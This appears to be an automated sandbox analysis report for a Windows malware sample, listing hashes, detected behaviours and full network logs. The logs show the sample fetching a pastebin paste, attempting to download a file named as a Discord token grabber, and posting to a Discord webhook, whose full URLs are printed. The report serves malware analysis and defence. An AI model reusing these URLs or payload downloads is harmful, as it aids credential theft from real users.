Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system -
submitted
09-09-2024 02:50
Behavioral task
behavioral1
Sample
d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe
-
Size
114KB
-
MD5
d58a15cab40574fad4928aa7eb6de4fe
-
SHA1
4c1096ad6339c4a2da77429c6418096e02cc0d8f
-
SHA256
75f64ca84cb9d2ebe9dbe752030dd74607d173f9be5ca50d73e86dfb0f715fed
-
SHA512
d4de46c25eb12d1c851c5d78a826f5823bda8eafe056cc4fa31ba449df6705b83dc0956bfed8ef0c060cc54ff61f864a6a55c3ca7d563600dc4f254c1271ccfd
-
SSDEEP
3072:/ZkAVxSgIk8GO8njNAcf4ixlWENI6CZHZ:/yySDk8GOkjWPixlWEBCZHZ
Malware Config
Signatures
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 2 pastebin.com 4 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 icanhazip.com -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe -
description ioc Process
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 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 d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 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 d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 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 d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe
Processes
Network
-
Remote address: 8.8.8.8:53
Request
pastebin.com IN A
Response
pastebin.com IN A 104.20.4.235
pastebin.com IN A 104.20.3.235
pastebin.com IN A 172.67.19.24
-
Remote address: 104.20.4.235:443
Request
GET /raw/810VyuUQ HTTP/1.1
User-Agent: Mozilla/5.0
Host: pastebin.com
Response
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: MISS
Last-Modified: Mon, 09 Sep 2024 02:50:22 GMT
Server: cloudflare
CF-RAY: 8c03ded47f5cd1fa-LHR
-
Remote address: 8.8.8.8:53
Request
c.pki.goog IN A
Response
c.pki.goog IN CNAME pki-goog.l.google.com
pki-goog.l.google.com IN A 142.250.179.227
-
Remote address: 142.250.179.227:80
Request
GET /r/gsr1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: c.pki.goog
Response
HTTP/1.1 200 OK
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 1739
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Mon, 09 Sep 2024 02:19:38 GMT
Expires: Mon, 09 Sep 2024 03:09:38 GMT
Cache-Control: public, max-age=3000
Age: 1844
Last-Modified: Mon, 08 Jul 2024 07:38:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
-
Remote address: 142.250.179.227:80
Request
GET /r/r4.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: c.pki.goog
Response
HTTP/1.1 200 OK
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 436
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Mon, 09 Sep 2024 02:27:34 GMT
Expires: Mon, 09 Sep 2024 03:17:34 GMT
Cache-Control: public, max-age=3000
Age: 1368
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
-
Remote address: 8.8.8.8:53
Request
icanhazip.com IN A
Response
icanhazip.com IN A 104.16.185.241
icanhazip.com IN A 104.16.184.241
-
Remote address: 104.16.185.241:80
Request
GET / HTTP/1.1
User-Agent: Mozilla/5.0
Host: icanhazip.com
Response
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 14
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Set-Cookie: __cf_bm=h6_rgnbdU4gSHUWZAkNckEGB5B.iZZCXk0PjHL91NtI-1725850223-1.0.1.1-BXw_jrG5sdgt7cTvOhXPn0gIacsoL7379NsjaPsNIYUs_yb9.wMLm0TpzS0Jwxr.TMtGj1ZncwnOS4nOlBjeHg; path=/; expires=Mon, 09-Sep-24 03:20:23 GMT; domain=.icanhazip.com; HttpOnly
Server: cloudflare
CF-RAY: 8c03ded69bce773b-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address: 8.8.8.8:53
Request
www.geodatatool.com IN A
Response
www.geodatatool.com IN A 158.69.65.151
-
Remote address: 158.69.65.151:443
Request
GET / HTTP/1.1
User-Agent: Mozilla/5.0
Host: www.geodatatool.com
Response
HTTP/1.1 200 OK
Date: Mon, 09 Sep 2024 02:51:56 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 18912
Connection: keep-alive
Vary: Accept-Encoding
-
Remote address: 8.8.8.8:53
Request
cdn.discordapp.com IN A
Response
cdn.discordapp.com IN A 162.159.130.233
cdn.discordapp.com IN A 162.159.134.233
cdn.discordapp.com IN A 162.159.133.233
cdn.discordapp.com IN A 162.159.135.233
cdn.discordapp.com IN A 162.159.129.233
-
GET https://cdn.discordapp.com/attachments/755908849738842196/755910043265663157/savedecrypter.exe d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe
Remote address: 162.159.130.233:443
Request
GET /attachments/755908849738842196/755910043265663157/savedecrypter.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: cdn.discordapp.com
Connection: Keep-Alive
Response
HTTP/1.1 404 Not Found
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=.h7gcTV1W5GOSum.hEWzMLjw_VJ3AIL1msgnLyt_UQ4-1725850226-1.0.1.1-xuHNx5FzUzrQPpYTgkYZ0Bz5rlUwh0BUzt_9kedB59oSUyxYDv0f7lqLX__QW5sVxiXVYvaapoXCsv9aD1LAfA; path=/; expires=Mon, 09-Sep-24 03:20:26 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uHFDNPL9EOhca8r0w9aibe1477ZEk6O1BN0o%2FeA3w7KRHmaRRHySJ6nuryrgcD0nOa20pbYpuMxlfU5s7MIyRuI9FRR77gvjpE7nlbfKeP82SVQMkbeNn1aCVzyvXbUQUuQ9Vw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Set-Cookie: _cfuvid=h.Nqup7dZKTAhkR7yu.ebv7OrnjMFgE5jmG.Tl.MgQc-1725850226376-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8c03deeacbec769e-LHR
alt-svc: h3=":443"; ma=86400
-
GET https://cdn.discordapp.com/attachments/755908849738842196/755909095772389386/ZBDiscordTokenGrabber.exe d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe
Remote address: 162.159.130.233:443
Request
GET /attachments/755908849738842196/755909095772389386/ZBDiscordTokenGrabber.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: cdn.discordapp.com
Connection: Keep-Alive
Cookie: __cf_bm=.h7gcTV1W5GOSum.hEWzMLjw_VJ3AIL1msgnLyt_UQ4-1725850226-1.0.1.1-xuHNx5FzUzrQPpYTgkYZ0Bz5rlUwh0BUzt_9kedB59oSUyxYDv0f7lqLX__QW5sVxiXVYvaapoXCsv9aD1LAfA; _cfuvid=h.Nqup7dZKTAhkR7yu.ebv7OrnjMFgE5jmG.Tl.MgQc-1725850226376-0.0.1.1-604800000
Response
HTTP/1.1 404 Not Found
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UCw3Iw2xY9C%2F9AzjF5rCRqRu3HfeaLinRurN3RtekrdRkizrxtfkb0H2KgVGaFL8nbNMISHL%2BBrIFFTtWq%2F0BCKJedLMPryTyHnwdYnolUC68AWtqdzQFLTAHl60xFWwwYIOwA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 8c03deeb2c07769e-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address: 8.8.8.8:53
Request
discordapp.com IN A
Response
discordapp.com IN A 162.159.134.233
discordapp.com IN A 162.159.133.233
discordapp.com IN A 162.159.135.233
discordapp.com IN A 162.159.129.233
discordapp.com IN A 162.159.130.233
-
POST https://discordapp.com/api/webhooks/760580485616369734/e1QxCJz2FnJj53U5oR7ZbEgOzQKcCUaVd0hMf6FNwe9la9GAEOAGmv-H1d9DzVC5ZjPu d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe
Remote address: 162.159.134.233:443
Request
POST /api/webhooks/760580485616369734/e1QxCJz2FnJj53U5oR7ZbEgOzQKcCUaVd0hMf6FNwe9la9GAEOAGmv-H1d9DzVC5ZjPu HTTP/1.1
Accept: application/json
Content-Type: application/json
User-Agent: Mozilla/5.0
Host: discordapp.com
Content-Length: 500
Cache-Control: no-cache
Response
HTTP/1.1 404 Not Found
Content-Type: application/json
Content-Length: 45
Connection: keep-alive
set-cookie: __dcfduid=4488b4e66e5611ef89867e2489fb2ca8; Expires=Sat, 08-Sep-2029 02:50:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1725850228
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OhWXMSqp4PkDBj5pEvCyrJib5pNxU2HsyDL7LS7OLStRCvtPYFC%2BYL1jc3rBP%2BmzZcrVEA%2FmfgHj7XRwL45BFGdzW9ahueIPHY4X0R75thI7MyFbXRQsK6YYxu85BsQd"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: __sdcfduid=4488b4e66e5611ef89867e2489fb2ca8f6177168b647c9006e5a20254f565cb7e63dd3297a8497f8d0ee9efe13ddfdd0; Expires=Sat, 08-Sep-2029 02:50:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cf_bm=TLXY1Ku.8Dto4GjObmdHJvHMaGmzXv1QBbu2XG_XuPE-1725850226-1.0.1.1-vSGzGTOpVGDfPuhSZW6FYoIc9b6XgsV63OSaI9ofUz5oqlqGqDYiEnpbaF2PWypTdzVwkFzMPAMXLg1bDohqmg; path=/; expires=Mon, 09-Sep-24 03:20:26 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Set-Cookie: __cfruid=d57337332c3fdafbfaad846009b36e35c3fe3d81-1725850226; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=1Q5tErr4dL8cH0tRZciE5Ac5w8KXyYb7XYOPQdp1vfI-1725850226829-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8c03deecefac9480-LHR
-
104.20.4.235:443 https://pastebin.com/raw/810VyuUQ tls, http d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe 801 B 4.2kB 9 10
HTTP Request
GET https://pastebin.com/raw/810VyuUQ
HTTP Response
200 -
142.250.179.227:80 http://c.pki.goog/r/r4.crl http d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe 606 B 5.0kB 8 6
HTTP Request
GET http://c.pki.goog/r/gsr1.crl
HTTP Response
200
HTTP Request
GET http://c.pki.goog/r/r4.crl
HTTP Response
200 -
294 B 668 B 5 3
HTTP Request
GET http://icanhazip.com/
HTTP Response
200 -
158.69.65.151:443 https://www.geodatatool.com/ tls, http d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe 1.4kB 24.9kB 17 23
HTTP Request
GET https://www.geodatatool.com/
HTTP Response
200 -
162.159.130.233:443 https://cdn.discordapp.com/attachments/755908849738842196/755909095772389386/ZBDiscordTokenGrabber.exe tls, http d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe 1.9kB 5.2kB 11 9
HTTP Request
GET https://cdn.discordapp.com/attachments/755908849738842196/755910043265663157/savedecrypter.exe
HTTP Response
404
HTTP Request
GET https://cdn.discordapp.com/attachments/755908849738842196/755909095772389386/ZBDiscordTokenGrabber.exe
HTTP Response
404 -
162.159.134.233:443 https://discordapp.com/api/webhooks/760580485616369734/e1QxCJz2FnJj53U5oR7ZbEgOzQKcCUaVd0hMf6FNwe9la9GAEOAGmv-H1d9DzVC5ZjPu tls, http d58a15cab40574fad4928aa7eb6de4fe_JaffaCakes118.exe 1.4kB 5.2kB 8 10
HTTP Request
POST https://discordapp.com/api/webhooks/760580485616369734/e1QxCJz2FnJj53U5oR7ZbEgOzQKcCUaVd0hMf6FNwe9la9GAEOAGmv-H1d9DzVC5ZjPu
HTTP Response
404
-
58 B 106 B 1 1
DNS Request
pastebin.com
DNS Response
104.20.4.235 104.20.3.235 172.67.19.24
-
56 B 107 B 1 1
DNS Request
c.pki.goog
DNS Response
142.250.179.227
-
59 B 91 B 1 1
DNS Request
icanhazip.com
DNS Response
104.16.185.241 104.16.184.241
-
65 B 81 B 1 1
DNS Request
www.geodatatool.com
DNS Response
158.69.65.151
-
64 B 144 B 1 1
DNS Request
cdn.discordapp.com
DNS Response
162.159.130.233 162.159.134.233 162.159.133.233 162.159.135.233 162.159.129.233
-
60 B 140 B 1 1
DNS Request
discordapp.com
DNS Response
162.159.134.233 162.159.133.233 162.159.135.233 162.159.129.233 162.159.130.233
MITRE ATT&CK Enterprise v15
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 342B
MD5 71317bea6f2cc496e28d6f32710cff95
SHA1 0ca93e1b5e1ecf1e944865dad1d7418842bb2a12
SHA256 08cc988aa56629186459b2324dead5e54e6df21b0b9617bee582c5c57b576f39
SHA512 dd621e7b07c23b349e6efe555c7aefcf1abca3a35b3d421c48f12ec60b9f0813d26949d7c66556c98117a895aba35e3274fe14e4f79e93e05a83c951edce8ac9
-
Filesize
70KB
MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b